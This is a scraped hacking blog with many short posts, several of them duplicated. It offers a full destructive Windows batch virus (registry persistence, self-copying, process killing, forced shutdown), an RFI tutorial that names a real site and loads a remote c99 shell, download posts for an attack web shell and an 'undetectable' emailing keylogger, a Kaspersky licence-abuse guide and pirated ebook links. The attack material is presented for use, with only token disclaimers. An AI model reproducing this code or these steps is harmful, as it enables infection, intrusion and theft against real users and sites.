Proxy Harvester and fast checker
Proxy Harvester and fast checker
I saw many threads where people searched a proxy harvester / proxy checker.
I found this 2 tools anywhere in the world wide web.
The Harvester can finds 100-400 proxys (very fast) - the checker is also fast.
No cracks.
Click Here To Download
File name: Proxy.rar
Submission date: 2011-08-24 06:54:37 (UTC)
Current status: finished
Result: 0/ 44 (0.0%)
MD5 : ea59c783f03181298665e7e21f99a92f
SHA1 : c93dcd513586a0d11925e1670c55780232daac65
SHA256: 8790889694682e9eb367778955304402342f7c6d7105b99d8a 6793d17ecb3767
I found this 2 tools anywhere in the world wide web.
The Harvester can finds 100-400 proxys (very fast) - the checker is also fast.
No cracks.
Click Here To Download
File name: Proxy.rar
Submission date: 2011-08-24 06:54:37 (UTC)
Current status: finished
Result: 0/ 44 (0.0%)
MD5 : ea59c783f03181298665e7e21f99a92f
SHA1 : c93dcd513586a0d11925e1670c55780232daac65
SHA256: 8790889694682e9eb367778955304402342f7c6d7105b99d8a 6793d17ecb3767
Read More Add your Comment 0 comments
How to create a Dangerous virus using Batch programming
How to create a Dangerous virus using Batch programming
In this post i am going to give you dangerous virus code which is written in Batch Programming language.
Virus can do:
1.Copy itself into startup
2.Copy itself over one thousand times into random spots in your computer.
3.Hide its self and all other created files
4.Task kill MSN, Norton, Windows Explorer, Limewire.
5.Swap the left mouse button with the right one
6.Opens alert boxes
7.Changes the time to 12:00 and shuts down the computer
copy this code into notepad and save as Greatgame.bat(while saving select all files instead of text ).
Here is the Code:
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP Enjoy!
Virus can do:
1.Copy itself into startup
2.Copy itself over one thousand times into random spots in your computer.
3.Hide its self and all other created files
4.Task kill MSN, Norton, Windows Explorer, Limewire.
5.Swap the left mouse button with the right one
6.Opens alert boxes
7.Changes the time to 12:00 and shuts down the computer
copy this code into notepad and save as Greatgame.bat(while saving select all files instead of text ).
Here is the Code:
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP Enjoy!
Read More Add your Comment 0 comments
Learn html and css & Javascript and Ajax[E-Book]
Learn html and css & Javascript and Ajax[E-Book]
Fast, and simple tutorial leading Web developer.
&
download -->
http://prefiles.com/brgul791s93t/Wiley.Learn.JavaScript.and.Ajax.with.w3Schools.Jun.2010.rar
Enjoy!!!
Read More Add your Comment 0 comments
allaboutrajni.com (all about rajni) a funny website works only when you switch off your internet
Today while exploring Google i came across a very funny and innovative website namedwww.allaboutrajni.com (all about rajnik)
This website is a new launch. its all about Rajnikanth ,It has all the story , facts and jokes about Rajnikanth But the most funny Part about this website is that it only works when you switch off your Internet connection/Modem .
Try it by visiting following link :-
http://www.desimartini.com/allaboutrajni.htm
or Click here
its too funny try it..! !!
Note:- you must switch off your Modem to explore this website
And if you try to switch on your Internet/modem while browsing this website it shows a popup which says
" Aiyoo!
That was unexpected,
To keep browsing,
switch off your Internet. "
ROFL . :D :D :D
Read More Add your Comment 0 comments
Use Kaspersky internet security 2012 lifetime without license key
Use Kaspersky internet security 2012 lifetime without
License Key
HOW IT WORKS JUST FOLLOW THESE 7 STEPS:-
- First of all disconnect your internet connection and Remove modem or Disconnect that Ethernet Cable. it is very necessary that to get lifetime Key of Kasper sky internet security 2012 .(copy this post and save it to notepad)
- Delete the existing key (If You Have)
- Now Open Kaspersky 2012 product Then Click on (Either KIS or KAV) settings
- Un-check the “Enable protection” Check box
- Go Then “Options’ In the settings window itself , And uncheck Below Line
- a) “Enable Self-Defense”
- ”Disable External service control”
- Goto Start>Run>Type “regedit”>
HKEY_LOCAL_MACHINE>SOFTWARE>KasperskyLab>environment.
From Right list >> double click on “ProductStatus”
Then , in the “Value Data” Field . replace “Released” with “Beta” and click OK
- Now again Open Kaspersky 2012 product And Go settings Now Check Below these check boxes :-
- i)”Enable protection” (In “Protection” sub menu)
- ii)”Enable Self-Defense” (In “Options” sub menu)
- iii)”Disable External service control” (In “Options” sub menu)
- Click on “OK”
- Close the error message saying that “Protection is not running” .
Couse ot Error massage that, you have not installed any key and the product is not registered also
- Restart your PC !
NOTE:- You must Restart your PC Other then it will not work properly
Now , after restart , Open Your Kaspersky product .
Then click On License” (Somewhat in the middle in the bottom)
Click on “Activate new license”
then click on “Activate Beta License”
then click on “Next”
From Now You will Not Blacklist you will get 30 Days Genuine Key .Just click on Activate beta license and click on .Next . That's it The kaspersky server will give u an new 30 days genuine key . So Enjoy!!!
Read More Add your Comment 0 comments
█▓▒░ Complete eBook Collection Free ░▒▓█
█▓▒░ Complete eBook Collection Free ░▒▓█
Hey Guys, I have tons of eBooks on my computer, most of them I've never read....
Anyway, I wanted to let you all have the same collection as me
Most of the eBooks focus on programming, but there are also ones on network security, general hacking, exploitation and so on.
Now, all the eBooks I have are from around these forums mostly, but they have all been free, so I'm not ripping someone off.
I'm not going to put a Sh*tcash or File*ce link..Just a simple to mediafire link,
Altogether the .rar is 500Mb's, so I will upload in mediafire
Again, I don't even remember where I got all these from.
Anyway, I wanted to let you all have the same collection as me
Most of the eBooks focus on programming, but there are also ones on network security, general hacking, exploitation and so on.
Now, all the eBooks I have are from around these forums mostly, but they have all been free, so I'm not ripping someone off.
I'm not going to put a Sh*tcash or File*ce link..Just a simple to mediafire link,
Altogether the .rar is 500Mb's, so I will upload in mediafire
Again, I don't even remember where I got all these from.
__
Exploiting:
(25MB)
http://www.mediafire.com/?ye5q6drkfar1w4rHacking:
(50MB)
http://www.mediafire.com/?jwrqebxkcwq87wmNetwork Programming:
(65MB)
http://www.mediafire.com/?6thtyhtw3j25p5cProgramming:
(85MB)
http://www.mediafire.com/?70ilqkluvj76culNetwork Security:
(62MB)
http://www.mediafire.com/?hd2we2d5edbu87zSql:
(40MB)
http://www.mediafire.com/?ifm9tzgn18mxetcUnix:
(60MB)
http://www.mediafire.com/?mv8myj899ensg0zThe Files are pretty big, so they might take awhile to download...
Read It :cool:
Read More Add your Comment 0 comments
RFI Hacking Tutorial
RFI Hacking Tutorial
Lets Start
1st Step : Find a Vunerable websites using Google Dork
There you have RFI google dorks:
http://pastebin.com/EgTx8mjH
“inurl:index.php?page=” its Most Popular Dork of RFI hacking
This will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command
www.targetsite.com/index.php?page=www.google.com
see example of this website http://www.cbspk.com
So the hacker url will become
http://www.cbspk.com/v2/index.php?pa...www.google.com
If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack.
Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:
http://www.sh3ll.org/c99.zip
The hacker would first upload the shells to a webhosting site such as ripway.com, viralhosts.com,110mb.com or another free hosts etc.
Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell ishttp://www.sh3ll.org/c99.txt?
Now here is how a hacker would execute the following command to gain access
http://www.cbspk.com/v2/index.php?pa...l.org/c99.txt?
Don't Forget To add “?” after .txt at the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it.
Read More Add your Comment 0 comments
I-47 v1.3 Shell [UPDATED RELEASE]
I-47 v1.3 Shell [UPDATED RELEASE]
Hello Guys !! :) :D
Arjun developed a new version of I-47 Shell with some more new features and some bugs fixed. It is also translated in hindi, so that other users can have an experience with the shell in non-english language
Here are the screen shots
Last screenshot shows you the domain name with the corresponding script like mybb, vb etc
Features :
- Mass Code Injector
- Web Surver Fuzzer
- Mass Mailer + Mail Bomber
- Proxy Installer
- Forums Defacer + Forum Password Changer
- Dos
- Backconnect with perl, c, php
- Bind Shell
- Database Connect & Dump
- Domain info
- PHP Evaluate
- Automatic Symlink creation
- Automatic enable all functions and turn safe mode off
- Download whole website with just one click
- Password Protected
- Zone-h Poster
- Included Bypasser
- Attractive Look
New Features :
- Included Script Locator
- Included TCP / UDP Scanner
- Included Bruteforcer
- Removed some bugs
Features :
- Mass Code Injector
- Web Surver Fuzzer
- Mass Mailer + Mail Bomber
- Proxy Installer
- Forums Defacer + Forum Password Changer
- Dos
- Backconnect with perl, c, php
- Bind Shell
- Database Connect & Dump
- Domain info
- PHP Evaluate
- Automatic Symlink creation
- Automatic enable all functions and turn safe mode off
- Download whole website with just one click
- Password Protected
- Zone-h Poster
- Included Bypasser
- Attractive Look
New Features :
- Included Script Locator
- Included TCP / UDP Scanner
- Included Bruteforcer
- Removed some bugs
Code:
Username : I-47
Password : I-47
Here is your link for the shell.
http://www.mediafire.com/?pvex55omvp4khke
Hindi version :
http://www.mediafire.com/?0tx87ebzzf4l7t8
I hope you guys will like the shell.
CREDITS TO ARJUN INDIAN HACKER
Read More Add your Comment 0 comments
On-line Scanner Tool For Web Application Security
Hello Friends Today i am going to tell you about some on-line scanner tool which are helpful for you in case of web application security testing. I hope you like it and bookmark in your browser for future work done.
Enjoy my share!
Enjoy my share!
Read More Add your Comment 0 comments
HUGE E-BOOK COLLECTIONS 120 !
HUGE E-BOOK COLLECTIONS 120 !
Back With A Collection Of Books , most of them have to do with making money, but there are few spreading guides, hacking and such.
I Hope It Will Be Useful For You :D
Download From Here
Enjoy Guys !!
Please Atleast Comment As Thannks :( !
Read More Add your Comment 0 comments
THE HACKER'S UNDERGROUND HANDBOOK Ebook Download
THE HACKER'S UNDERGROUND HANDBOOK Ebook
Download
This book will take you from the core to the top. It will tell you how to hack in simple steps. Everything is presented in a simple and effective manner. It’s a great source for the beginner who want to become a Hacker. This will install aHacker’s Mindset on you.
The following skills are uncovered in this book
1. You will learn all the hacker underground tricks and learn to apply them in real world situations.
2. You will be put into a hacker mindset and learn to think like a Hacker.
3. By learning how a hacker thinks and acts, you will be able to protect yourself from future hack attacks.
4. You will acquire knowledge nonexistent to 99.9% of the people in the world!
5. This Underground handbook may get you interested in pursuing a career as an Ethical Hacker.
This book is of great value for all those who have a dream to become a Hacker
DOWNLOAD
DOWNLOAD (torrent link)
Download
This book will take you from the core to the top. It will tell you how to hack in simple steps. Everything is presented in a simple and effective manner. It’s a great source for the beginner who want to become a Hacker. This will install aHacker’s Mindset on you.
The following skills are uncovered in this book
1. You will learn all the hacker underground tricks and learn to apply them in real world situations.
2. You will be put into a hacker mindset and learn to think like a Hacker.
3. By learning how a hacker thinks and acts, you will be able to protect yourself from future hack attacks.
4. You will acquire knowledge nonexistent to 99.9% of the people in the world!
5. This Underground handbook may get you interested in pursuing a career as an Ethical Hacker.
This book is of great value for all those who have a dream to become a Hacker
DOWNLOAD
DOWNLOAD (torrent link)
Read More Add your Comment 0 comments
Facebook All New Cool Chat Emotions Codes
Facebook All New Cool Chat Emotions Codes
Who Are Fully Addicted To Facebook Can Use This New Facebook Smileys To Your Friends And Surprise Them :) :D
Here Are the all codes for facebook :)
Just Copy And Paste It In Your Friends Chat Box :)
[[f9.laugh]]
[[f9.sad]]
[[f9.angry]]
[[f9.sleepy]]
[[f9.shock]]
[[f9.kiss]]
[[f9.inlove]]
[[f9.pizza]]
[[f9.coffee]]
[[f9.rain]]
[[f9.bomb]]
[[f9.sun]]
[[f9.heart]]
[[f9.heartbreak]]
[[f9.doctor]]
[[f9.ghost]]
[[f9.brb]]
[[f9.wine]]
[[f9.gift]]
[[f9.adore]]
[[f9.angel]]
[[f9.baloons]]
[[f9.bowl]]
[[f9.cake]]
[[f9.callme]]
[[f9.clap]]
[[f9.confused]]
[[f9.curllip]]
[[f9.devilface]]
[[f9.lying]]
[[f9.rofl]]
[[f9.billiard]]
[[f9.cakepiece]]
[[f9.rosedown]]
[[f9.shutmouth]]
[[f9.shy]]
[[f9.silly]]
[[f9.tongue1]]
[[f9.fastfood]]
[[f9.ring]]
[[f9.plate]]
[[f9.candle]]
[[f9.party]]
Hope You Like It :)
Please Comment Atleast Thanks !! :(
So That I Can Post More Nice Posts :) :D
Read More Add your Comment 0 comments
[ebook]Wireless Network Hacks & Mods for Dummies
Wireless Network Hacks & Mods for Dummies
359 pages | Publisher: For Dummies | English | ISBN-10: 0764595830 | PDF
Connect the old, the new, the practical, and the fun!
Play multiplayer games, set up home surveillance, or take your network outside
Now that you've got a wireless network going, you're getting the urge to see what else it can do, right? Hook up with this book and find simple, fun ways to expand its possibilities. Add your home entertainment gear, beef up speed and performance, discover wireless on the go, and get more out of your network!
Discover how to:
* Extend broadband throughout your home
* Protect your network from snoops
* Boost cellular signals
* Set up a wireless hot spot
* Take wireless to your car
* Make calls with your wireless network and VoIP
Download
Read More Add your Comment 0 comments
Social Engineering Book Pack[Download]
I realized that I have some books in my e-book collection and I want to share them with you. Maybe some of you have some o this books but for those who doesn't.
DOWNLOAD LINK:
Hope you will enjoy them and learn as much as I did.
File contains:
1. How to win Friends and Influence People
2. Kevin Mitnick - The Art of Deception (Plus Banned First Chapter)
3. Kevin Mitnick - The Art of Intrusion
4. Propaganda and Mass Persuasion
5. Robert Greene, The 48 Laws of Power
6. The Art of Human Hacking
7. The Complete Idiots Guide to Persuasion
8. The Power Of Persuasion
9. The Science Of Influence
10. The_Art_of_War
Read More Add your Comment 0 comments
How To R00t server in easy way !
Hey Guys ... I'm Got one more interesting ebook which i came through.I think too many people are interested in Server r00t so today I'm Presenting Black-X Genius's Ebook On server r00ting. Hope You will Enjoy The book
This small book is will explain
you how professional hackers got root on servers.
this book is for beginner.
Lessons Of Book
Lesson 1- What is Root ?
Lesson 2- How can I get on the Root ?
Lesson 3- Local root and how to search for him ?
Lesson 4- How connect the server ?
Lesson 5- How to get Root access ?
Lesson 6- What happen after the root ?
Lesson 7- The withdrawal of my domain ?
Lesson 8- How to do mass deface ?
Lesson 9- How to register the hacked websites on Zoneh?
Lesson 10- How to clear tracks from server ?
DOWNLOAD HERE
This Is For Educational Purpose Only .... !!!
This small book is will explain
you how professional hackers got root on servers.
this book is for beginner.
Lessons Of Book
Lesson 1- What is Root ?
Lesson 2- How can I get on the Root ?
Lesson 3- Local root and how to search for him ?
Lesson 4- How connect the server ?
Lesson 5- How to get Root access ?
Lesson 6- What happen after the root ?
Lesson 7- The withdrawal of my domain ?
Lesson 8- How to do mass deface ?
Lesson 9- How to register the hacked websites on Zoneh?
Lesson 10- How to clear tracks from server ?
DOWNLOAD HERE
This Is For Educational Purpose Only .... !!!
Read More Add your Comment 1 comments
[FUD 0/37] ☆☆Vulcan Logger☆☆ [100% FUD]
Vulcan Logger is a monitoring software that records all keystrokes on a computer. It then securely emails the strokes to a email set by the user. This software is for educational purposes only.
Features:
[x] Completely Undetectable(FUD)
[x] Choose SMTP/Port
[x] Choose the Subject of the Email
[x] Send Computer Information
[x] Send Screenshots
[x] Set Interval of emails
[x] Test E-Mail
[x] Choose the Icon
[x] Add to Startup
[x] Melt
[x] Display Error on Run
[x] Choose title/message/type of error
[x] Download on Execute
[x] Website Visitor on Execute
[x] Random variable and function names
[x] Generate strong encryption key
[x] Generate random Assembly
[x] File Pumper
[x] Choose File Name
[x] 27KB output.
Direct Download Link
Safe Run Sandboxie
Read More Add your Comment 1 comments
Malware Scanner (ViusTotal & NoVirusThanks) For Scanning Files
Malware Scanner (ViusTotal & NoVirusThanks) For Scanning Files
Here's a one more thing which i wanted to share was this scanner.
This malware scanner scans your files by virus total and no virusthanks.So that you can be secured by not opening it.
I decided to give you this ingenious tool to you guys ! :)
I hope you would like it
You can download it Here
Here Are Some screenshots :)
Credits To
Napsterakos (Main Code)
AeonHack (For the Theme)
Thanks For Visiting DorksNight
Keep Visiting Our Blog We Will Post More Interesthing Things.
Read More Add your Comment 0 comments